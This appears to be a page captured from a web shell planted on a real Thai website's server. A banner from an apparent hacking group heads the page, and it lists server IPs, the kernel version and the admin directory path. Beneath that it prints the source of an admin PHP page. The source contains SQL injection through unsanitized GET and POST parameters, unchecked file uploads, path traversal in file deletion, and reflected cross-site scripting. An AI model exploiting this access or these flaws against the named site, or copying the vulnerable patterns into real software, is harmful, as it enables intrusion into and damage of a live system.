1337 3YP455 5H311
:
216.73.216.0
:
119.59.104.17 / www.hrdigest.co.th
:
Linux re1.hostinglotus.net 4.18.0-553.58.1.el8_10.x86_64 #1 SMP Wed Jun 25 06:37:46 EDT 2025 x86_64
:
/
home
/
hrdigest
/
public_html
/
admin
/
UP104D F1L3:
files >> /home/hrdigest/public_html/admin/page_b.php
<? // *****Copy right 2003 ,TNS NETWORK LTD.,PART.***** // require("../inc/function_admin.php"); $mem = checkid(); if($_GET[action] == "delete"){ if(!empty($_GET[im])){ @unlink("../images/webpage/$_GET[im]"); } mysql_query("Delete From `topic` Where `cno` = '$_GET[id]' "); mysql_query("Delete From `detail` Where `cno` = '$_GET[id]' "); header("Location: page_b.php?cname=$_GET[cname]&cid=$_GET[cid]&cno=$_GET[cno]"); }elseif($_GET[action] == "remove"){ if(!empty($_GET[im])){ @unlink("../images/webpage/$_GET[im]"); } mysql_query("Update `topic` Set `$_GET[na]` = '' Where `cno` = '$_GET[id]' ") or die ("Can't Perform Query 0"); header("Location: page_b.php?cname=$_GET[cname]&cid=$_GET[cid]&cno=$_GET[cno]&action=edit&id=$_GET[id]"); } if(!empty($_POST[action])){ // Start Program Update And Insert Data Base $a_in = ""; $b_in = ""; $a_up = ""; $fields = array_keys($_POST); for($i = 0; $i < count($fields); $i++){ $actual_var = $fields[$i]; $actual_val = ($_POST[$actual_var]); $actual_val = ($actual_val); if($actual_var <> "id"){ if($actual_var <> "image"){ if($actual_var <> "action"){ if($actual_var <> "Submit"){ if($actual_var <> "pic_size"){ if($actual_var <> "cnox"){ if($actual_var <> "cno2"){ $a_in .= " `$actual_var` ,"; $b_in .= " '$actual_val' ,"; $a_up .= " `$actual_var` = '$actual_val' ,"; } } } } } } } } $a_in = substr($a_in,0,-1); $b_in = substr($b_in,0,-1); $a_up = substr($a_up,0,-1); if(!empty($_POST[image])){ foreach($_POST[image] as $key => $value){ $image[$key] = $value; } } $fields = array_keys($_FILES); for($i = 0; $i < count($fields); $i++){ $Picture = $fields[$i]; $$Picture = $_FILES[$Picture][tmp_name]; $$Picture_size = $_FILES[$Picture][size]; if(!empty($$Picture)){ //$$Picture_name = ((date("ymdHis_") . str_replace(" ","",$_FILES[$Picture][name]))); $$Picture_name = $_FILES[$Picture][name]; if(!empty($image[$Picture])){ @unlink("../images/webpage/$image[$Picture]"); } if (!empty($_POST["pic_size"])) { $images = $$Picture; $height=$_POST["pic_size"]; $size=GetimageSize($images); $width=round($height*$size[0]/$size[1]); $images_orig = ImageCreateFromJPEG($images); $photoX = ImagesX($images_orig); $photoY = ImagesY($images_orig); $images_fin = ImageCreateTrueColor($width, $height); ImageCopyResampled($images_fin, $images_orig, 0, 0, 0, 0, $width+1, $height+1, $photoX, $photoY); ImageJPEG($images_fin,"../images/webpage/" . $$Picture_name); // ชื่อไฟล์ใหม่ ImageDestroy($images_orig); ImageDestroy($images_fin); }else{ copy($$Picture , "../images/webpage/" . $$Picture_name); } copy($$Picture , "../images/photo_zoom/" . $$Picture_name); $a_in .= " , `$Picture`"; $b_in .= " , '" . $$Picture_name . "'"; $a_up .= ", `$Picture` = '" . $$Picture_name . "'"; } } //echo $a_in; //echo "<br>"; //echo $b_in; //echo "<br>"; //echo $a_up; if($_POST[action] == "Add"){ mysql_query("Insert Into `topic` ( $a_in ,`cno2`) Values ( $b_in, '0' )") or die ("Can't Perform Query 1"); }elseif($_POST[action] == "Update"){ if ($_POST[cno2] <> -1 ) { $ccp = ", `cno2` = '0' "; }else{ $ccp = ""; } //echo("Update `topic` Set $a_up $ccp Where `cno` = '$_POST[id]' "); mysql_query("Update `topic` Set $a_up $ccp Where `cno` = '$_POST[id]' ") or die ("Can't Perform Query 2"); //header("Location: page_b.php?cname=$_GET[cname]&cid=$_GET[cid]&cno=$_POST[cnox]"); } } ?> <html> <head> <? require("../inc/title.php") ?> <link href="index.css" rel="stylesheet" type="text/css"> <link rel="stylesheet" type="text/css" href="../js/jquery.fancybox.css"> <script type="text/javascript" src="calendarDateInput.js"></script> <script language=javascript src="icon/lib.js" type=text/javascript></script> <script type="text/javascript" src="../js/jscolor/jscolor.js"></script> <script language="JavaScript" type="text/javascript" src="wysiwyg.js"></script> <script language="JavaScript"> <!-- function del(id,im){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "page_b.php?cname=<? echo $_GET[cname] ?>&cid=<? echo $_GET[cid] ?>&cno=<? echo $_GET[cno] ?>&action=delete&id=" + id + "&im=" + im; } } } function remove(id,im,na){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "page_b.php?cname=<? echo $_GET[cname] ?>&cid=<? echo $_GET[cid] ?>&cno=<? echo $_GET[cno] ?>&action=remove&id=" + id + "&im=" + im + "&na=" + na; } } } --> </script> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <body bgcolor="#FFFFFF"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="top"><? top_page() ?></td> </tr> </table> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="200" valign="top" background="icon/bgbar.jpg"><? require("menu.php") ?></td> <td valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" class="main"> <tr> <td valign="top" ><table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td width="90%"><b>:: <? $menux = mysql_fetch_array(mysql_query("Select * From `menu` Where `cid` = '$_GET[cid]' ")); echo $menux["name1"]; ?> ::</b></td> <td align="right"><table width="46" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="20" valign="top"><a href="<? echo $version1 ?>"><img src="icon/version_01.gif" width="20" height="14" border="0"></a></td> <td width="6" valign="top"><img src="icon/version_02.gif" width="6" height="14"></td> <td width="20" valign="top"><a href="<? echo $version2 ?>"><img src="icon/version_03.gif" width="20" height="14" border="0"></a></td> </tr> </table></td> </tr> </table> <? if($_GET[action] != "edit"){ ?> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="56%"> </td> <td width="44%"> <div align="right"><? if(isset($_GET[cno]) && $_GET[cno] <> 0){ $ck_link = mysql_fetch_array(mysql_query("Select * From `topic` Where `cid` = '$_GET[cid]' && `cno` = '$_GET[cno]' Order By `sort` Asc , `cno` Asc ")); ?> <input name="button22" type="button" class="main1" onClick="location='addnew_menu_style.php?cid=<? echo $_GET["cid"] ?>&cno=<? echo $_GET["cno"] ?>';" value=" SETTING LAYOUT " /> <input name="button" type="button" class="main1" onClick="location='page_b.php?cid=<? echo $_GET["cid"] ?>&cno=<? echo $ck_link["cno2"] ?>';" value=" Back " /> <? }else{ ?> <? } ?> </div></td> </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td valign="top"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="main"> <tr> <td valign="top"> <table width="100%" border="1" align="center" cellpadding="3" cellspacing="0" bordercolor="#6699CC" class="main"> <tr bgcolor="#cccccc"> <td width="50" align="center" bgcolor="#6699CC" class="main2"><strong>รูป</strong></td> <td align="center" bgcolor="#6699CC" class="main2"><strong>หัวข้อ</strong></td> <td width="100" align="center" bgcolor="#6699CC" class="main2"><strong>แสดงผลหน้าแรก</strong></td> <td width="100" align="center" bgcolor="#6699CC" class="main2"><strong>วันที่</strong></td> <td width="70" align="center" bgcolor="#6699CC" class="main2"><strong>ลำดับ</strong></td> <td width="100" align="center" bgcolor="#6699CC" class="main2"><strong>แก้ไข</strong></td> </tr><? if (isset($_GET[cno]) && $_GET[cno]<>0) { $sub_cno = " && `cno2` = '0' " ; }else{ $sub_cno = " && `cno2` = 0 "; } $result = mysql_query("Select * From `topic` Where `cid` = '$_GET[cid]' $sub_cno Order By `sort` Asc , `cno` Asc ") or die ("Can't Perform Query 3"); while($row = mysql_fetch_array($result)){ ?> <tr> <td align="center"><? if(!empty($row[pic])){ echo "<a href='../images/webpage/$row[pic]' target='_blank'><img src='icon/b_image.gif' alt='Zoom Image' width='15' height='15' border='0'></a>"; }else{ echo "<font color='#ff0000'>[-]</font>"; } ?></td> <td height="26"><a href="page_bx.php?cname=<? echo $_GET[cname] ?>&cid=<? echo $row[cid] ?>&cno=<? echo $row[cno] ?>"> <b><? echo $row[$txt_topic] ?></b></a><? if ($row[s_page] ==1 ) { ?> <img src="../images/icon/bg.png" alt="Gallery" width="16" height="16" align="absbottom"> <? } ?> <? $rd_new = mysql_fetch_array(mysql_query("Select * From `form_icon` Where `id`= $row[id_icon] ")) ; if ($rd_new[id]<>0 ){ echo "<img src='../images/webpage/$rd_new[filepic]'>"; } ?> <? if ($row[$txt_topic2]) { echo "<br>$row[$txt_topic2]"; } ?> </td> <td align="center"><? echo $row[$add_name] ?></td> <td align="center"><? echo $row["ctime"] ?></td> <td align="center"><? echo $row["sort"] ?></td> <td align="center"> <? if(!empty($row['linkurl'])){ ?> <img src="../images/weblink.jpg" width="16" height="16"> <? }else{ if ($row[s_page] == 2) { ?> <a href="page_b.php?cid=<?=$_GET[cid]?>&cno=<?=$row[cno]?>"><img src="../images/icon_plus.gif" alt="เพิ่มหัวข้อย่อย" width="15" height="15" border="0"></a> <? }else{ ?> <a style="cursor:pointer;" onClick="location='page_bx.php?cname=<? echo $_GET[cname] ?>&cid=<? echo $row[cid] ?>&cno=<? echo $row[cno] ?>';"><img src="icon/detail.png" alt="เพิ่มรายละเอียด" width="16" height="16"></a> <? } } ?> <a style="cursor:pointer;" onClick="location='page_b.php?cname=<? echo $_GET[cname] ?>&cid=<? echo $row[cid] ?>&action=edit&cno=<? echo $row[cno] ?>&id=<? echo $row[cno] ?>';"><img src="images/edit2.gif" width="14" height="14"></a> <a style="cursor:pointer;" onClick="del('<? echo $row[cno] ?>')"><img src="icon/del.gif" width="16" height="16"></a> </td> </tr> <? } // End While ?> </table></td> </tr> </table> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><hr size="1" width="95%"></td> </tr> </table></td> </tr> </table></td> </tr> </table> <script type="text/javascript" src="../js/jquery.fancybox.js"></script> <script type="text/javascript"> <!-- $(document).ready(function(e) { $('.searchidcard').bind('click', function(){ $this = $(this); $id = $this.attr('data-id'); $.fancybox.open({ 'href':'inc_page_a.php', 'type': 'ajax', 'helpers': { 'overlay': { 'locked': false } }, 'ajax': { 'type': 'POST', 'data': { 'id': $id, 'search': $('input[name=' + $id + ']').val() } } }); }); }); --> </script> <form name="post_form" method="post" action="" enctype="multipart/form-data"> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main"> <tr> <td><b>:: เพิ่มหัวข้อใหม่ ::</b></td> </tr> </table> <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="main"> <tr> <td bgcolor="#6699CC" class="main2">หัวข้อภาษาไทย</td> </tr> <tr> <td><input name="topic" type="text" class="main" size="60"></td> </tr> <tr> <td bgcolor="#6699CC" class="main2">หัวข้อภาษาอังกฤษ</td> </tr> <tr> <td><input name="top_eng" type="text" class="main" id="top_eng" size="60"></td> </tr> <tr> <td bgcolor="#6699CC" class="main2">เนื้อหาโดยย่อ ภาษาไทย </td> </tr> <tr> <td><textarea name="detail" cols="80" rows="5" class="main" id="detail"></textarea> <script language="javascript1.2">generate_wysiwyg('detail');</script></td> </tr> <tr> <td bgcolor="#6699CC" class="main2">เนื้อหาโดยย่อ ภาษาอังกฤษ </td> </tr> <tr> <td><textarea name="des_eng" cols="80" rows="5" class="main" id="des_eng"></textarea> <script language="javascript1.2">generate_wysiwyg('des_eng');</script></td> </tr> <tr> <td><table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td width="150" height="28" align="right" class="main1">รูปภาพประกอบ 1 : </td> <td><input name="pic" type="file" class="main" id="pic" accept="image/gif, image/jpeg, image/png" ></td> </tr> <tr> <td height="28" align="right" class="main1">ลำดับการแสดงผล : </td> <td><input name="sort" type="text" class="main" id="sort" value="0" size="10"></td> </tr> <tr> <td height="28" align="right" class="main1">แสดงผลในหน้าแรก : </td> <td class="main"><input name="add_name" type="text" class="main" id="add_name" value="0" size="10"> (0=ไม่แสดงผล,1=แสดงผล)</td> </tr> <tr> <td height="28" align="right" class="main1">วันที่ : </td> <td><script>DateInput('ctime', true, 'YYYY-MM-DD')</script></td> </tr> <tr> <td height="28" align="right" class="main1">Icon : </td> <td> <label> <input name="id_icon" type="radio" value="0">None </label> <? $rd_new = mysql_query("Select * From `form_icon` ") or die ("Can't Perform Query 3"); while($row_new = mysql_fetch_array($rd_new)){ ?> <label> <input name="id_icon" type="radio" value="<?=$row_new[id]?>"><img src="../images/webpage/<?=$row_new[filepic]?>"></label> <? } ?> </td> </tr> <? if(eregi("^34$|^36$|^42$", $_GET["cid"])){ ?> <? } ?> <tr> <td height="5" colspan="2" class="main1"> </td> </tr> <tr> <td height="28" class="main1"> </td> <td><input name="Submit" type="submit" class="main" id="Submit" value=" Save Data "> <input name="action" type="hidden" id="action" value="Add"> <input type="hidden" name="cid" value="<? echo $_GET[cid] ?>"> <input name="cno2" type="hidden" id="cno2" value="<? echo $_GET[cno] ?>"></td> </tr> </table> </td> </tr> <tr> <td> </td> </tr> </table> </form> <? }elseif($_GET[action] == "edit"){ $row = mysql_fetch_array(mysql_query("Select * From `topic` Where `cno` = '$_GET[id]' ")); ?> <script type="text/javascript" src="../js/jquery.fancybox.js"></script> <script type="text/javascript"> <!-- $(document).ready(function(e) { $('.searchidcard').bind('click', function(){ $this = $(this); $id = $this.attr('data-id'); $.fancybox.open({ 'href':'inc_page_a.php', 'type': 'ajax', 'helpers': { 'overlay': { 'locked': false } }, 'ajax': { 'type': 'POST', 'data': { 'id': $id, 'search': $('input[name=' + $id + ']').val() } } }); }); }); --> </script> <form name="post_form" method="post" action="" enctype="multipart/form-data"> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main"> <tr> <td><b>:: Edit Data ::</b></td> </tr> </table> <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="main"> <tr> <td bgcolor="#6699CC" class="main2">Topic Thai ></td> </tr> <tr> <td><input name="topic" type="text" class="main" value="<? echo $row[topic] ?>" size="60"></td> </tr> <tr> <td bgcolor="#6699CC" class="main2">Topic Eng ></td> </tr> <tr> <td><input name="top_eng" type="text" class="main" id="top_eng" value="<? echo $row[top_eng] ?>" size="60"></td> </tr> <tr> <td bgcolor="#6699CC" class="main2">Description Thai</td> </tr> <tr> <td><textarea name="detail" cols="80" rows="10" class="main" id="detail"><? echo $row[detail] ?></textarea> <script language="javascript1.2">generate_wysiwyg('detail');</script></td> </tr> <tr> <td bgcolor="#6699CC" class="main2">Description Eng</td> </tr> <tr> <td><textarea name="des_eng" cols="80" rows="10" class="main" id="des_eng"><? echo $row[des_eng] ?></textarea> <script language="javascript1.2">generate_wysiwyg('des_eng');</script></td> </tr> <tr> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <? if ($row[s_page] == 2) { ?> <tr bgcolor="#6699CC"> <td height="16" colspan="2" align="right" bgcolor="#6699CC" class="main1"><div align="left"><span class="main2">เนื้อหาด้านใน ภาษาไทย </span></div></td> </tr> <tr> <td height="28" colspan="2" align="right" class="main1"><div align="left"> <textarea name="l_detail" cols="80" rows="5" class="main" id="l_detail"><? echo $row[l_detail] ?></textarea> <script language="javascript1.2">generate_wysiwyg('l_detail');</script> </div></td> </tr> <tr bgcolor="#6699CC"> <td height="16" colspan="2" align="right" bgcolor="#6699CC" class="main1"><div align="left"><span class="main2">เนื้อหาด้านใน ภาษาอังกฤษ </span></div></td> </tr> <tr> <td height="28" colspan="2" align="right" class="main1"><div align="left"> <textarea name="l_des_eng" cols="80" rows="5" class="main" id="l_des_eng"><? echo $row[l_des_eng] ?></textarea> <script language="javascript1.2">generate_wysiwyg('l_des_eng');</script> </div></td> </tr> <? } ?> <tr> <td width="150" height="28" align="right" class="main1">รูปภาพประกอบ 1: </td> <td><input name="pic" type="file" class="main" id="pic" accept="image/gif, image/jpeg, image/png" > <? if(!empty($row[pic])){ echo "<a href='../images/webpage/$row[pic]' target='_blank'><img src='icon/b_image.gif' border='0' /> View Image</a> : <a style='cursor:pointer;' onClick=\"remove2('$row[cno]' , '$row[pic]' , 'pic');\"><img src='icon/del.gif' border='0' /> Remove Image</a>"; } ?></td> </tr> <tr> <td height="28" align="right" class="main1">ลำดับการแสดงผล : </td> <td><input name="sort" type="text" class="main" id="sort" value="<? echo $row[sort] ?>" size="10"></td> </tr> <tr> <td height="28" align="right" class="main1">แสดงผลในหน้าแรก : </td> <td class="main"><input name="add_name" type="text" class="main" id="add_name" value="<? echo $row[add_name] ?>" size="10"> (0=ไม่แสดงผล,1=แสดงผล)</td> </tr> <tr> <td height="28" align="right" class="main1">วันที่ : </td> <td> <script>DateInput('ctime', true, 'YYYY-MM-DD', '<? echo $row[ctime] ?>')</script> <input name="action" type="hidden" id="action" value="Update"> <input type="hidden" name="id" value="<? echo $row[cno] ?>"> <input name="image[pic]" type="hidden" id="image[pic]" value="<? echo $row[pic] ?>"></td> </tr> <tr> <td height="28" align="right" class="main1">Icon : </td> <td><input name="id_icon" type="radio" value="0"> None <? $rd_new = mysql_query("Select * From `form_icon` ") or die ("Can't Perform Query 3"); while($row_new = mysql_fetch_array($rd_new)){ ?> <label> <input name="id_icon" type="radio" value="<?=$row_new[id]?>" <? if ($row_new[id]==$row[id_icon]) { echo "checked"; } ?>> <img src="../images/webpage/<?=$row_new[filepic]?>"> </label> <? } ?></td> </tr> <? if(eregi("^34$|^36$|^42$", $_GET["cid"])){ ?> <? } ?> <tr> <td height="5" colspan="2" class="main1"> </td> </tr> <tr> <td height="28" class="main1"> </td> <td><input name="Submit" type="submit" class="main" id="Submit" value=" Save Data "> <? if(isset($_GET[cno]) && $_GET[cno] <> 0){ $ck_link = mysql_fetch_array(mysql_query("Select * From `topic` Where `cid` = '$_GET[cid]' && `cno` = '$_GET[cno]' Order By `sort` Asc , `cno` Asc ")); } ?> <input name="Submit2" type="button" class="main" id="Submit2" onClick="location='page_b.php?cname=<? echo $_GET[cname] ?>&cid=<? echo $_GET[cid] ?>&cno=<? echo $ck_link[cno2] ?>';" value=" Back "> <input name="action" type="hidden" id="action" value="Update"> <input type="hidden" name="id" value="<? echo $row[cno] ?>"> <input name="image[pic]" type="hidden" id="image[pic]" value="<? echo $row[pic] ?>"> <input name="cnox" type="hidden" id="cnox" value="<? echo $ck_link[cno2] ?>"></td> </tr> </table></td> </tr> <tr> <td> </td> </tr> </table> </form> <? } ?> </td> </tr> </table></td> </tr> </table> </body> </html>
1337r0j4n | 13379H0575 53CURI7Y 734M